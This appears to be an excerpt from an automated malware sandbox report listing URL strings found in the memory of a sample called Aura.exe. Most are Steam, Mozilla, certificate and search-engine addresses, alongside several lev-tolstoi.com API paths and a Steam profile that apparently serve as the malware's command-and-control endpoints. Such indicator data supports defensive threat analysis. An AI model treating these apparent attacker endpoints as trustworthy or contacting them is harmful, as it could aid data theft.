                Source: Aura.exe, 00000002.00000003.1815244598.0000000005B50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: Aura.exeString found in binary or memory: http://ocsp.digicert.com0
                Source: Aura.exeString found in binary or memory: http://ocsp.digicert.com0A
                Source: Aura.exeString found in binary or memory: http://ocsp.entrust.net02
                Source: Aura.exeString found in binary or memory: http://ocsp.entrust.net03
                Source: Aura.exe, 00000002.00000003.1815244598.0000000005B50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: Aura.exe, 00000002.00000002.3511215128.000000000336C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/acco
                Source: Aura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                Source: Aura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                Source: Aura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000002.3511215128.000000000336C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                Source: Aura.exeString found in binary or memory: http://www.digicert.com/CPS0
                Source: Aura.exeString found in binary or memory: http://www.entrust.net/rpa03
                Source: Aura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
                Source: Aura.exe, 00000002.00000003.1815244598.0000000005B50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: Aura.exe, 00000002.00000003.1815244598.0000000005B50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: Aura.exe, 00000002.00000003.1767549116.0000000005B69000.00000004.00000800.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1766979070.0000000005B6B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                Source: Aura.exe, 00000002.00000003.1816553901.0000000005B2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
                Source: Aura.exe, 00000002.00000003.1841956357.0000000005B2C000.00000004.00000800.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1842228400.0000000005B2C000.00000004.00000800.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1839023378.0000000005B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
                Source: Aura.exe, 00000002.00000003.1767549116.0000000005B69000.00000004.00000800.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1766979070.0000000005B6B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: Aura.exe, 00000002.00000003.1767549116.0000000005B69000.00000004.00000800.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1766979070.0000000005B6B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: Aura.exe, 00000002.00000003.1767549116.0000000005B69000.00000004.00000800.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1766979070.0000000005B6B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: Aura.exe, 00000002.00000003.1739501843.000000000337A000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
                Source: Aura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
                Source: Aura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
                Source: Aura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
                Source: Aura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
                Source: Aura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
                Source: Aura.exe, 00000002.00000003.1739501843.000000000337A000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                Source: Aura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                Source: Aura.exe, 00000002.00000003.1739501843.000000000337A000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                Source: Aura.exe, 00000002.00000003.1739501843.000000000337A000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=_92TWn81
                Source: Aura.exe, 00000002.00000003.1739501843.000000000337A000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=FRRi
                Source: Aura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
                Source: Aura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
                Source: Aura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
                Source: Aura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
                Source: Aura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
                Source: Aura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
                Source: Aura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
                Source: Aura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
                Source: Aura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
                Source: Aura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=oOCAGrkRfpQ6&l=e
                Source: Aura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
                Source: Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
                Source: Aura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
                Source: Aura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
                Source: Aura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                Source: Aura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
                Source: Aura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                Source: Aura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                Source: Aura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
                Source: Aura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
                Source: Aura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
                Source: Aura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
                Source: Aura.exe, 00000002.00000003.1816553901.0000000005B2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
                Source: Aura.exe, 00000002.00000003.1841956357.0000000005B2C000.00000004.00000800.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1842228400.0000000005B2C000.00000004.00000800.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1839023378.0000000005B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: Aura.exe, 00000002.00000003.1767549116.0000000005B69000.00000004.00000800.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1766979070.0000000005B6B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: Aura.exe, 00000002.00000003.1767549116.0000000005B69000.00000004.00000800.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1766979070.0000000005B6B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: Aura.exe, 00000002.00000003.1767549116.0000000005B69000.00000004.00000800.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1766979070.0000000005B6B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: Aura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
                Source: Aura.exe, 00000002.00000003.1841956357.0000000005B2C000.00000004.00000800.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1842228400.0000000005B2C000.00000004.00000800.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1839023378.0000000005B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIX
                Source: Aura.exe, 00000002.00000003.1816553901.0000000005B2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
                Source: Aura.exe, 00000002.00000003.1739584373.00000000033B8000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000002.3511433189.0000000003415000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.2531562354.0000000003415000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739501843.0000000003382000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/
                Source: Aura.exe, 00000002.00000003.2531148527.00000000033B7000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000002.3511215128.00000000033B7000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.2531674049.00000000033B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com//:O
                Source: Aura.exe, 00000002.00000003.1739584373.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.2531562354.00000000033F2000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.2531148527.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000002.3511215128.000000000336C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api
                Source: Aura.exe, 00000002.00000002.3511433189.00000000033F4000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.2531562354.00000000033F2000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.2531148527.00000000033D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api1
                Source: Aura.exe, 00000002.00000003.1739584373.00000000033D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apib
                Source: Aura.exe, 00000002.00000002.3511433189.00000000033F4000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.2531562354.00000000033F2000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.2531148527.00000000033D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apil
                Source: Aura.exe, 00000002.00000002.3511215128.000000000336C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apimv
                Source: Aura.exe, 00000002.00000002.3511433189.0000000003415000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.2531562354.0000000003415000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/pi
                Source: Aura.exe, 00000002.00000003.1739584373.00000000033B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/pi(
                Source: Aura.exe, 00000002.00000003.1863854855.0000000003417000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/r
                Source: Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
                Source: Aura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                Source: Aura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
                Source: Aura.exe, 00000002.00000003.1739584373.00000000033D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/dn.c
                Source: Aura.exe, 00000002.00000002.3511215128.000000000336C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.or
                Source: Aura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                Source: Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
                Source: Aura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
                Source: Aura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
                Source: Aura.exe, 00000002.00000003.1739501843.0000000003382000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
                Source: Aura.exe, 00000002.00000003.1739501843.000000000337A000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
                Source: Aura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
                Source: Aura.exe, 00000002.00000003.1739501843.0000000003382000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/765611997243319007
                Source: Aura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
                Source: Aura.exe, 00000002.00000002.3511215128.000000000336C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampower
                Source: Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
                Source: Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
                Source: Aura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
                Source: Aura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
                Source: Aura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
                Source: Aura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
                Source: Aura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
                Source: Aura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                Source: Aura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
                Source: Aura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
                Source: Aura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                Source: Aura.exe, 00000002.00000003.1769020508.0000000005BC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
                Source: Aura.exe, 00000002.00000003.1816181771.0000000005C4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: Aura.exe, 00000002.00000003.1816181771.0000000005C4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: Aura.exe, 00000002.00000003.1792800080.0000000005B77000.00000004.00000800.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1792942781.0000000005B77000.00000004.00000800.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1769020508.0000000005BC3000.00000004.00000800.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1769094742.0000000005B77000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                Source: Aura.exe, 00000002.00000003.1769094742.0000000005B52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                Source: Aura.exe, 00000002.00000003.1792800080.0000000005B77000.00000004.00000800.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1792942781.0000000005B77000.00000004.00000800.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1769020508.0000000005BC3000.00000004.00000800.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1769094742.0000000005B77000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                Source: Aura.exe, 00000002.00000003.1769094742.0000000005B52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                Source: Aura.exe, 00000002.00000003.1841956357.0000000005B2C000.00000004.00000800.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1842228400.0000000005B2C000.00000004.00000800.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1839023378.0000000005B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
                Source: Aura.exe, 00000002.00000003.1767549116.0000000005B69000.00000004.00000800.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1766979070.0000000005B6B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: Aura.exeString found in binary or memory: https://www.entrust.net/rpa0
                Source: Aura.exe, 00000002.00000003.1816553901.0000000005B2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
                Source: Aura.exe, 00000002.00000003.1767549116.0000000005B69000.00000004.00000800.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1766979070.0000000005B6B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: Aura.exe, 00000002.00000003.1816181771.0000000005C4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
